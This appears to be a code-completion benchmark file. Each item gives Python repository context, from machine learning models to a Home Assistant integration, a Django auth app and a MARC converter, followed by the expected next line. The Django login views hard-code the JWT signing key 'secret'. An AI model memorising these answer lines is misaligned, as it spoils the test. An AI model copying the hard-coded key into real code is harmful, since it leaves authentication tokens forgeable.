LOSSES.build(cfg) elif cfg['type'] in MMDET_LOSSES._module_dict.keys(): return MMDET_LOSSES.build(cfg) else: return MMSEG_LOSSES.build(cfg) # Path: mmdet3d/models/dense_heads/fcaf3d_head.py import MinkowskiEngine as ME import warnings import torch from mmcv.cnn import Scale, bias_init_with_prob from mmcv.ops import nms3d, nms3d_normal from mmcv.runner.base_module import BaseModule from torch import nn from mmdet3d.core.bbox.structures import rotation_3d_in_axis from mmdet3d.models import HEADS, build_loss from mmdet.core import reduce_mean # Copyright (c) 
OpenMMLab. All rights reserved.
# Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa
try:
    import MinkowskiEngine as ME
except ImportError:
    warnings.warn(
        'Please follow `getting_started.md` to install MinkowskiEngine.')
@HEADS.register_module()
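The decorator registers whatever class follows it into the `HEADS` registry, so the file almost certainly continues with the head's class definition; a sketch with assumed constructor arguments:

@HEADS.register_module()
class FCAF3DHead(BaseModule):
    """Sketch only: the real head also builds conv towers, losses, and NMS."""
    def __init__(self, n_classes, in_channels, loss_bbox=None, **kwargs):
        super().__init__()
        self.n_classes = n_classes
        self.loss_bbox = build_loss(loss_bbox) if loss_bbox else None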
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: jdejaegh/irm-kmi-ha # Path: custom_components/irm_kmi/api.py class IrmKmiApiClient: """API client for IRM KMI weather data""" COORD_DECIMALS = 6 def __init__(self, session: aiohttp.ClientSession) -> None: self._session = session self._base_url = "https://app.meteo.be/services/appv4/" async def get_forecasts_coord(self, coord: dict) -> dict: """Get forecasts for given city.""" assert 'lat' in coord assert 'long' in coord coord['lat'] = round(coord['lat'], self.COORD_DECIMALS) coord['long'] = round(coord['long'], self.COORD_DECIMALS) response = await self._api_wrapper(params={"s": "getForecasts", "k": _api_key("getForecasts")} | coord) return await response.json() async def get_image(self, url, params: dict | None = None) -> bytes: """Get the image at the specified url with the parameters""" r: ClientResponse = await self._api_wrapper(base_url=url, params={} if params is None else params) return await r.read() async def _api_wrapper( self, params: dict, base_url: str | None = None, path: str = "", method: str = "get", data: dict | None = None, headers: dict | None = None, ) -> any: """Get information from the API.""" try: async with async_timeout.timeout(10): response = await self._session.request( method=method, url=f"{self._base_url if base_url is None else base_url}{path}", headers=headers, json=data, params=params ) response.raise_for_status() return response except asyncio.TimeoutError as exception: raise IrmKmiApiCommunicationError("Timeout error fetching information") from exception except (aiohttp.ClientError, socket.gaierror) as exception: raise IrmKmiApiCommunicationError("Error fetching information") from exception except Exception as exception: # pylint: disable=broad-except raise IrmKmiApiError(f"Something really wrong happened! 
{exception}") from exception # Path: custom_components/irm_kmi/const.py CONF_DARK_MODE: Final = "dark_mode" # Path: custom_components/irm_kmi/const.py CONF_STYLE: Final = "style" # Path: custom_components/irm_kmi/const.py CONF_STYLE_OPTIONS: Final = [ OPTION_STYLE_STD, OPTION_STYLE_CONTRAST, OPTION_STYLE_YELLOW_RED, OPTION_STYLE_SATELLITE ] # Path: custom_components/irm_kmi/const.py CONF_USE_DEPRECATED_FORECAST: Final = 'use_deprecated_forecast_attribute' # Path: custom_components/irm_kmi/const.py CONF_USE_DEPRECATED_FORECAST_OPTIONS: Final = [ OPTION_DEPRECATED_FORECAST_NOT_USED, OPTION_DEPRECATED_FORECAST_DAILY, OPTION_DEPRECATED_FORECAST_HOURLY ] # Path: custom_components/irm_kmi/const.py CONFIG_FLOW_VERSION = 3 # Path: custom_components/irm_kmi/const.py DOMAIN: Final = 'irm_kmi' # Path: custom_components/irm_kmi/const.py OPTION_DEPRECATED_FORECAST_NOT_USED: Final = 'do_not_use_deprecated_forecast' # Path: custom_components/irm_kmi/const.py OPTION_STYLE_STD: Final = 'standard_style' # Path: custom_components/irm_kmi/const.py OUT_OF_BENELUX: Final = ["außerhalb der Benelux (Brussels)", "Hors de Belgique (Bxl)", "Outside the Benelux (Brussels)", "Buiten de Benelux (Brussel)"] # Path: custom_components/irm_kmi/utils.py def get_config_value(config_entry: ConfigEntry, key: str) -> Any: if config_entry.options and key in config_entry.options: return config_entry.options[key] return config_entry.data[key] # Path: custom_components/irm_kmi/config_flow.py import logging import async_timeout import voluptuous as vol from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN from homeassistant.config_entries import ConfigEntry, ConfigFlow, OptionsFlow from homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_ZONE from homeassistant.core import callback from homeassistant.data_entry_flow import FlowResult from homeassistant.helpers.aiohttp_client import async_get_clientsession from homeassistant.helpers.selector import (EntitySelector, EntitySelectorConfig, SelectSelector, SelectSelectorConfig, SelectSelectorMode) from .api import IrmKmiApiClient from .const import (CONF_DARK_MODE, CONF_STYLE, CONF_STYLE_OPTIONS, CONF_USE_DEPRECATED_FORECAST, CONF_USE_DEPRECATED_FORECAST_OPTIONS, CONFIG_FLOW_VERSION, DOMAIN, OPTION_DEPRECATED_FORECAST_NOT_USED, OPTION_STYLE_STD, OUT_OF_BENELUX) from .utils import get_config_value """Config flow to set up IRM KMI integration via the UI.""" _LOGGER = logging.getLogger(__name__) class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN): VERSION = CONFIG_FLOW_VERSION @staticmethod @callback def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow: """Create the options flow.""" return IrmKmiOptionFlow(config_entry) async def async_step_user(self, user_input: dict | None = None) -> FlowResult: """Define the user step of the configuration flow.""" errors = {} if user_input: _LOGGER.debug(f"Provided config user is: {user_input}") if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None: errors[CONF_ZONE] = 'zone_not_exist' # Check if zone is in Benelux if not errors: api_data = {} try: async with async_timeout.timeout(10): api_data = await IrmKmiApiClient( session=async_get_clientsession(self.hass)).get_forecasts_coord( {'lat': zone.attributes[ATTR_LATITUDE], 'long': zone.attributes[ATTR_LONGITUDE]} ) except Exception: errors['base'] = "api_error" if api_data.get('cityName', None) in OUT_OF_BENELUX: errors[CONF_ZONE] = 'out_of_benelux' if not errors: await self.async_set_unique_id(user_input[CONF_ZONE]) self._abort_if_unique_id_configured() 
state = self.hass.states.get(user_input[CONF_ZONE]) return self.async_create_entry( title=state.name if state else "IRM KMI", data={CONF_ZONE: user_input[CONF_ZONE],
CONF_STYLE: user_input[CONF_STYLE],
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: v3ucn/Bert-vits2-V2.2 # Path: config.py class Resample_config: class Preprocess_text_config: class Bert_gen_config: class Emo_gen_config: class Train_ms_config: class Webui_config: class Server_config: class Translate_config: class Config: def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, transcription_path: str, cleaned_path: str, train_path: str, val_path: str, config_path: str, val_per_lang: int = 5, max_val_total: int = 10000, clean: bool = True, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, env: Dict[str, any], base: Dict[str, any], model: str, num_workers: int, spec_cache: bool, keep_ckpts: int, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, device: str, model: str, config_path: str, language_identification_library: str, port: int = 7860, share: bool = False, debug: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, models: List[Dict[str, any]], port: int = 5000, device: str = "cuda" ): def from_dict(cls, data: Dict[str, any]): def __init__(self, app_key: str, secret_key: str): def from_dict(cls, data: Dict[str, any]): def __init__(self, config_path: str): # Path: oldVersion/V210/text/japanese.py def text2sep_kata(text: str) -> (list, list): parsed = pyopenjtalk.run_frontend(text) res = [] sep = [] for parts in parsed: word, yomi = replace_punctuation(parts["string"]), parts["pron"].replace( "’", "" ) if yomi: if re.match(_MARKS, yomi): if len(word) > 1: word = [replace_punctuation(i) for i in list(word)] yomi = word res += yomi sep += word continue elif word not in rep_map.keys() and word not in rep_map.values(): word = "," yomi = word res.append(yomi) else: if word in _SYMBOL_TOKENS: res.append(word) elif word in ("っ", "ッ"): res.append("ッ") elif word in _NO_YOMI_TOKENS: pass else: res.append(word) sep.append(word) return sep, [hira2kata(i) for i in res], get_accent(parsed) # Path: oldVersion/V210/text/japanese_bert.py import sys import torch from transformers import AutoModelForMaskedLM, AutoTokenizer from config import config from .japanese import text2sep_kata LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm" tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH) models = dict()
def get_bert_feature(text, word2ph, device=config.bert_gen_config.device):
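The predicted line opens the feature-extraction function right after the module-level models = dict() cache. That lazy per-device cache pattern, reduced to a runnable sketch (load_model is a placeholder for the real AutoModelForMaskedLM.from_pretrained(...).to(device) call):

models = dict()

def load_model(device: str):
    # placeholder for the expensive HuggingFace model load; returns a sentinel
    return object()

def get_model(device: str = "cpu"):
    # load once per device, then reuse the same object on every later call
    if device not in models:
        models[device] = load_model(device)
    return models[device]

assert get_model("cpu") is get_model("cpu")  # second call hits the cache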
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: NOrangeeroli/SecondPose # Path: model/pcd_cross/modules/layers/factory.py def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module: r"""Factory function for dropout layer.""" if p is None or p == 0: return nn.Identity() else: return nn.Dropout(p=p, **kwargs) # Path: model/pcd_cross/modules/transformer/output_layer.py class AttentionOutput(nn.Module): def __init__(self, d_model, dropout=None, activation_fn='ReLU'): super(AttentionOutput, self).__init__() self.expand = nn.Linear(d_model, d_model * 2) self.activation = build_act_layer(activation_fn) self.squeeze = nn.Linear(d_model * 2, d_model) self.dropout = build_dropout_layer(dropout) self.norm = nn.LayerNorm(d_model) def forward(self, input_states): hidden_states = self.expand(input_states) hidden_states = self.activation(hidden_states) hidden_states = self.squeeze(hidden_states) hidden_states = self.dropout(hidden_states) output_states = self.norm(input_states + hidden_states) return output_states # Path: model/pcd_cross/modules/transformer/pe_transformer.py import torch import torch.nn as nn import torch.nn.functional as F from einops import rearrange from ..layers import build_dropout_layer from .output_layer import AttentionOutput r"""Vanilla Transformer without positional embeddings. The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine). """ class PEMultiHeadAttention(nn.Module): def __init__(self, d_model, num_heads, dropout=None): super(PEMultiHeadAttention, self).__init__() if d_model % num_heads != 0: raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads)) self.d_model = d_model self.num_heads = num_heads self.d_model_per_head = d_model // num_heads self.proj_q = nn.Linear(self.d_model, self.d_model) self.proj_k = nn.Linear(self.d_model, self.d_model) self.proj_v = nn.Linear(self.d_model, self.d_model) self.proj_p = nn.Linear(self.d_model, self.d_model) self.dropout = build_dropout_layer(dropout) def forward( self, input_q, input_k, input_v, embed_q, embed_k, key_masks=None, attention_factors=None, ): """Self-attention with positional embedding forward propagation. 
Args: input_q: torch.Tensor (B, N, C) input_k: torch.Tensor (B, M, C) input_v: torch.Tensor (B, M, C) embed_q: torch.Tensor (B, N, C) embed_k: torch.Tensor (B, M, C) key_masks: torch.Tensor (B, M), True if ignored, False if preserved attention_factors: torch.Tensor (B, N, M) Returns: hidden_states: torch.Tensor (B, C, N) attention_scores: torch.Tensor (B, H, N, M) """ q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads) k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads) v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads) attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5 if attention_factors is not None: attention_scores = attention_factors.unsqueeze(1) * attention_scores if key_masks is not None: attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf')) attention_scores = F.softmax(attention_scores, dim=-1) attention_scores = self.dropout(attention_scores) hidden_states = torch.matmul(attention_scores, v) hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)') return hidden_states, attention_scores class PEAttentionLayer(nn.Module): def __init__(self, d_model, num_heads, dropout=None): super(PEAttentionLayer, self).__init__() self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout) self.linear = nn.Linear(d_model, d_model) self.dropout = build_dropout_layer(dropout) self.norm = nn.LayerNorm(d_model) def forward( self, input_states, memory_states, input_embeddings, memory_embeddings, memory_masks=None, attention_factors=None, ): hidden_states, attention_scores = self.attention( input_states, memory_states, memory_states, input_embeddings, memory_embeddings, key_masks=memory_masks, attention_factors=attention_factors, ) hidden_states = self.linear(hidden_states) hidden_states = self.dropout(hidden_states) output_states = self.norm(hidden_states + input_states) return output_states, attention_scores class PETransformerLayer(nn.Module): def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'): super(PETransformerLayer, self).__init__() self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout)
self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn)
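The completed layer wires PEAttentionLayer into AttentionOutput. The head split/merge and einsum scoring inside PEMultiHeadAttention can be sanity-checked in a few lines; the shapes below are illustrative, not from the repo:

import torch
from einops import rearrange

b, n, m, h, c = 2, 5, 7, 4, 8   # batch, query len, key len, heads, dim per head
q = rearrange(torch.randn(b, n, h * c), 'b n (h c) -> b h n c', h=h)
k = rearrange(torch.randn(b, m, h * c), 'b m (h c) -> b h m c', h=h)
v = rearrange(torch.randn(b, m, h * c), 'b m (h c) -> b h m c', h=h)

scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / c ** 0.5  # (B, H, N, M)
out = torch.matmul(scores.softmax(dim=-1), v)              # (B, H, N, C/H)
out = rearrange(out, 'b h n c -> b n (h c)')               # heads merged back
assert out.shape == (b, n, h * c)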
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: KatantDev/YMdantic # Path: ymdantic/mixins.py class DeprecatedMixin: """Mixin that removes deprecated fields from a model.""" @model_validator(mode="before") def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]: """ Removes deprecated fields from the model. :param obj: Dictionary with the model data. :return: Dictionary with the model data, without deprecated fields. """ obj.pop("substituted", None) obj.pop("deprecation", None) obj.pop("decomposed", None) if obj.get("version") is not None: obj["title"] += f" ({obj.get('version')})" obj.pop("version") return obj # Path: ymdantic/models/base.py class YMBaseModel(BaseModel, ClientMixin): """Base Pydantic model for all future models.""" model_config = ConfigDict( alias_generator=to_camel, populate_by_name=True, extra="forbid", ) # Path: ymdantic/models/cover.py class Cover(YMBaseModel): """Pydantic model representing an album or artist cover.""" type: Literal["from-artist-photos", "from-album-cover"] # Cover type. Determines the source of the cover. uri: str # Cover URI. A unique identifier that can be used # to fetch the cover image. prefix: str # URI prefix. Used to build the full path to the cover # image. copyright_name: Optional[str] = None # Name of the cover's rights holder. Used very rarely. copyright_cline: Optional[str] = None # Cover copyright line. Used very rarely. def get_image_url(self, size: str = "200x200") -> HttpUrl: """ Returns the URL of the cover image at the given size. :param size: Image size. :return: URL of the cover image at the given size. """ return HttpUrl(f"https://{self.uri.replace('%%', size)}") # Path: ymdantic/models/artists/artist.py from typing import List, Optional, Dict, Any, Literal from pydantic import model_validator, HttpUrl from ymdantic.mixins import DeprecatedMixin from ymdantic.models.base import YMBaseModel from ymdantic.models.cover import Cover class Artist(YMBaseModel, DeprecatedMixin): """Pydantic model representing information about an artist.""" id: int # Unique artist identifier. name: str # Artist name. various: bool # Flag indicating whether the artist is a group. composer: bool # Flag indicating whether the artist is a composer. genres: List[str] # Genres of the artist's tracks. disclaimers: List[Literal[""]] # TODO: Check what can appear here. # List of the artist's disclaimers.
cover: Optional[Cover] = None
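The predicted field reuses the Cover model shown earlier. The two conventions it inherits, camelCase aliases from YMBaseModel and a mode="before" validator from DeprecatedMixin, can be reproduced with pydantic v2 alone; the field names here are illustrative:

# A minimal sketch of the two model conventions above, assuming pydantic v2.
# Track and its fields are made up for illustration.
from typing import Any, Dict
from pydantic import BaseModel, ConfigDict, model_validator
from pydantic.alias_generators import to_camel

class Track(BaseModel):
    model_config = ConfigDict(alias_generator=to_camel, populate_by_name=True)

    track_id: int
    title: str

    @model_validator(mode="before")
    @classmethod
    def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:
        obj.pop("substituted", None)  # drop a key the API may still send
        return obj

t = Track.model_validate({"trackId": 1, "title": "Song", "substituted": {}})
assert t.track_id == 1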
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: MichealCodez/awesome-project-ideas # Path: projects/artisans/backend/authentication/serializers.py class RegisterUserSerializer(serializers.ModelSerializer): class Meta: model = User # We defined the model to be the User model(default django User model). fields = ['id', 'first_name', 'last_name', 'username', 'email', 'password'] # Fields we need to register a user. # This code snippet is used to make the password field write only(not among user's data that'll be returned) for security reasons. extra_kwargs = { 'password':{'write_only':True} } # Let us hash the password for security reasons. def create(self, validated_data): password = validated_data.pop('password', None) # We are getting the password from the validated data. instance = self.Meta.model(**validated_data) # We are creating an instance of the User model with the validated data. if password is not None: instance.set_password(password) # We are hashing the password here. instance.save() # We are saving the instance. return instance # We are returning the instance. # Path: projects/artisans/backend/authentication/serializers.py class ResetPasswordSerializer(serializers.Serializer): user = User email = serializers.EmailField(required=True) new_password = serializers.CharField(max_length=68, required=True) confirm_password = serializers.CharField(max_length=68, required=True) # Path: projects/artisans/backend/authentication/views.py from rest_framework.views import APIView from .serializers import RegisterUserSerializer, ResetPasswordSerializer from rest_framework.response import Response from rest_framework.exceptions import AuthenticationFailed from django.contrib.auth.models import User from datetime import datetime, timedelta import jwt # This is the view logic for registering a user. # We defined the class and it inherits from the APIView class. class RegisterUserView(APIView): def post(self, request): # We defined a post method that takes in a request from a user. # We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data. serializer = RegisterUserSerializer(data=request.data) serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid). serializer.save() # We save the serializer. return Response(serializer.data) # We return the serializer data. # This is the view logic for logging a user in. class LoginUserView(APIView): def post(self, request): # We defined a post method that takes in a request from a user. email = request.data['email'] # We are getting the inputted email from the request data. password = request.data['password'] # We are getting the inputted password from the request data. # Let's check if the user exists in our database. user = User.objects.filter(email=email).first() if user is None: raise AuthenticationFailed('User not found!') # Let's check if the password is correct. if not user.check_password(password): raise AuthenticationFailed('Incorrect password!') # Let's create a payload variable that takes in the user's id and the current time. 
payload = { 'id':user.id, 'exp':datetime.utcnow() + timedelta(minutes=60), 'iat':datetime.utcnow() } # Let's create a token variable that takes in the payload and the secret key. token = jwt.encode(payload, 'secret', algorithm='HS256') response = Response() # We are setting the cookie to the token. response.set_cookie(key='jwt', value=token, httponly=True) # We are returning the response data and making sure it is in string format. response.data = { 'jwt':token.encode('utf8') } return response # This is the view logic to retrieve a user's data using the token. class UserView(APIView): def get(self, request): token = request.COOKIES.get('jwt') if not token: raise AuthenticationFailed('Unauthenticated!') # We are getting the payload from the token. try: payload = jwt.decode(token, 'secret', algorithms=['HS256']) except jwt.ExpiredSignatureError: raise AuthenticationFailed('Unauthenticated!') # We are getting the user from the payload. user = User.objects.filter(id=payload['id']).first() serializer = RegisterUserSerializer(user) return Response(serializer.data) # This is the view logic to logout a user. class LogoutView(APIView): def post(self, request): response = Response() response.delete_cookie('jwt') # We are deleting the cookie. # We are returning the response data with a success status message. response.data = { 'message':'Logout is successful' } return response # This is the logic for resetting a forgotten password. class ResetPasswordView(APIView): def post(self, request):
serializer = ResetPasswordSerializer(data=request.data)
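The answer instantiates the serializer imported at the top of views.py. The surrounding JWT lifecycle (issue in LoginUserView, verify in UserView) boils down to a few PyJWT calls; 'secret' mirrors the hard-coded key used in the views above:

# A runnable sketch of the token lifecycle: issue an HS256 token with an
# expiry, then decode it. jwt.decode validates 'exp' by default.
from datetime import datetime, timedelta
import jwt

payload = {'id': 1,
           'exp': datetime.utcnow() + timedelta(minutes=60),
           'iat': datetime.utcnow()}
token = jwt.encode(payload, 'secret', algorithm='HS256')

try:
    decoded = jwt.decode(token, 'secret', algorithms=['HS256'])
    print(decoded['id'])  # -> 1
except jwt.ExpiredSignatureError:
    print('token expired')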
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: liuhuang31/hifigan-sr # Path: env.py class AttrDict(dict): def __init__(self, *args, **kwargs): super(AttrDict, self).__init__(*args, **kwargs) self.__dict__ = self # Path: meldataset.py def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False): # if torch.min(y) < -1.: # print('min value is ', torch.min(y)) # if torch.max(y) > 1.: # print('max value is ', torch.max(y)) if training: with torch.no_grad(): # 16k to 24k/48k if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000): y = y.squeeze().cpu().numpy() y = librosa.resample(y, sampling_rate, 16000) y = librosa.resample(y, 16000, 24000) y = torch.FloatTensor(y) y = y.unsqueeze(0) sampling_rate = 24000 n_fft = int(n_fft/2) hop_size=int(hop_size/2) win_size=int(win_size/2) # 24k to 48k elif fmax <= 12000 and sampling_rate == 48000: y = y.squeeze().cpu().numpy() y = librosa.resample(y, sampling_rate, 24000) y = torch.FloatTensor(y) y = y.unsqueeze(0) sampling_rate = 24000 n_fft = int(n_fft/2) hop_size=int(hop_size/2) win_size=int(win_size/2) else: pass global mel_basis, hann_window if fmax not in mel_basis: mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device) hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device) y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') y = y.squeeze(1) spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)], center=center, pad_mode='reflect', normalized=False, onesided=True) spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9)) spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec) spec = spectral_normalize_torch(spec) return spec # Path: meldataset.py MAX_WAV_VALUE = 32768.0 # Path: meldataset.py def load_wav(full_path, sr): # sampling_rate, data = read(full_path) data, sampling_rate = librosa.load(full_path, mono=True, sr=sr) return data, sampling_rate # Path: models.py class Generator(torch.nn.Module): def __init__(self, h): super(Generator, self).__init__() self.h = h self.num_kernels = len(h.resblock_kernel_sizes) self.num_upsamples = len(h.upsample_rates) self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3)) resblock = ResBlock1 if h.resblock == '1' else ResBlock2 self.ups = nn.ModuleList() for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): self.ups.append(weight_norm( ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)), k, u, padding=(k-u)//2))) self.resblocks = nn.ModuleList() for i in range(len(self.ups)): ch = h.upsample_initial_channel//(2**(i+1)) for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)): self.resblocks.append(resblock(h, ch, k, d)) self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) self.ups.apply(init_weights) self.conv_post.apply(init_weights) def forward(self, x): x = self.conv_pre(x) for i in range(self.num_upsamples): x = F.leaky_relu(x, LRELU_SLOPE) x = self.ups[i](x) xs = None for j in range(self.num_kernels): if xs is None: xs = 
self.resblocks[i*self.num_kernels+j](x) else: xs += self.resblocks[i*self.num_kernels+j](x) x = xs / self.num_kernels x = F.leaky_relu(x) x = self.conv_post(x) x = torch.tanh(x) return x def remove_weight_norm(self): print('Removing weight norm...') for l in self.ups: remove_weight_norm(l) for l in self.resblocks: l.remove_weight_norm() remove_weight_norm(self.conv_pre) remove_weight_norm(self.conv_post) # Path: inference.py import glob import os import librosa import argparse import json import torch from scipy.io.wavfile import write from env import AttrDict from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav from models import Generator from __future__ import absolute_import, division, print_function, unicode_literals h = None device = None def load_checkpoint(filepath, device): assert os.path.isfile(filepath) print("Loading '{}'".format(filepath)) checkpoint_dict = torch.load(filepath, map_location=device) print("Complete.") return checkpoint_dict def get_mel(x): return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax) def get_mel_24k(x): return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000) def scan_checkpoint(cp_dir, prefix): pattern = os.path.join(cp_dir, prefix + '*') cp_list = glob.glob(pattern) if len(cp_list) == 0: return '' return sorted(cp_list)[-1] def inference(a):
generator = Generator(h).to(device)
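The answer builds the generator from the AttrDict config h. The AttrDict trick from env.py, binding __dict__ to the dict itself so JSON config keys read as attributes, fits in a few lines:

import json

class AttrDict(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.__dict__ = self  # keys become attributes

h = AttrDict(json.loads('{"n_fft": 1024, "sampling_rate": 48000}'))
assert h.n_fft == 1024 and h["sampling_rate"] == 48000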
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: edsu/marctable # Path: marctable/marc.py class MARC: def __init__(self) -> None: self.fields: List[Field] = [] @cache def get_field(self, tag: str) -> Field: for field in self.fields: if field.tag == tag: return field raise SchemaFieldError(f"{tag} is not a defined field tag in Avram schema") @cache def get_subfield(self, tag: str, code: str) -> Subfield: field = self.get_field(tag) return field.get_subfield(code) @property def avram_file(self) -> pathlib.Path: return pathlib.Path(__file__).parent / "marc.json" @classmethod @cache def from_avram(cls: Type["MARC"], avram_file: Optional[IO] = None) -> "MARC": marc = MARC() if avram_file is None: avram_file = marc.avram_file.open("r") for d in json.load(avram_file)["fields"].values(): marc.fields.append(Field.from_dict(d)) return marc def to_avram(self, avram_file: Optional[IO] = None) -> None: if avram_file is None: avram_file = self.avram_file.open("w") d = { "title": "MARC21 bibliographic format", "url": "https://www.loc.gov/marc/bibliographic/", "family": "marc", "language": "en", "fields": {f.tag: f.to_dict() for f in self.fields}, } json.dump(d, avram_file, indent=2) # Path: marctable/marc.py class SchemaFieldError(Exception): pass # Path: marctable/marc.py class SchemaSubfieldError(Exception): pass # Path: marctable/marc.py def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None: marc = MARC() for f in fields(): marc.fields.append(f) if not quiet: print(f) if n != 0 and len(marc.fields) >= n: break marc.to_avram(outfile) # Path: marctable/utils.py def _mapping(rules: list) -> dict: """ unpack the mapping rules into a dictionary for easy lookup >>> _mapping(["245", "260ac"]) {'245': None, '260': ['a', 'c']} """ marc = MARC.from_avram() if rules is None or len(rules) == 0: rules = [field.tag for field in marc.fields] m = {} for rule in rules: field_tag = rule[0:3] if marc.get_field(field_tag) is None: raise Exception(f"unknown MARC field in mapping rule: {rule}") subfields = set(list(rule[3:])) for subfield_code in subfields: if marc.get_subfield(field_tag, subfield_code) is None: raise Exception(f"unknown MARC subfield in mapping rule: {rule}") m[field_tag] = subfields or None return m # Path: marctable/utils.py def dataframe_iter( marc_input: BinaryIO, rules: list = [], batch: int = 1000 ) -> Generator[DataFrame, None, None]: columns = _columns(_mapping(rules)) for records_batch in records_iter(marc_input, rules, batch): yield DataFrame.from_records(records_batch, columns=columns) # Path: marctable/utils.py def to_csv( marc_input: BinaryIO, csv_output: TextIO, rules: list = [], batch: int = 1000, ) -> None: """ Convert MARC to CSV. """ first_batch = True for df in dataframe_iter(marc_input, rules=rules, batch=batch): df.to_csv(csv_output, header=first_batch, index=False) first_batch = False # Path: marctable/utils.py def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame: """ Return a single DataFrame for the entire dataset. """ return next(dataframe_iter(marc_input, rules, batch=0)) # Path: marctable/utils.py def to_parquet( marc_input: BinaryIO, parquet_output: IOBase, rules: list = [], batch: int = 1000, ) -> None: """ Convert MARC to Parquet. 
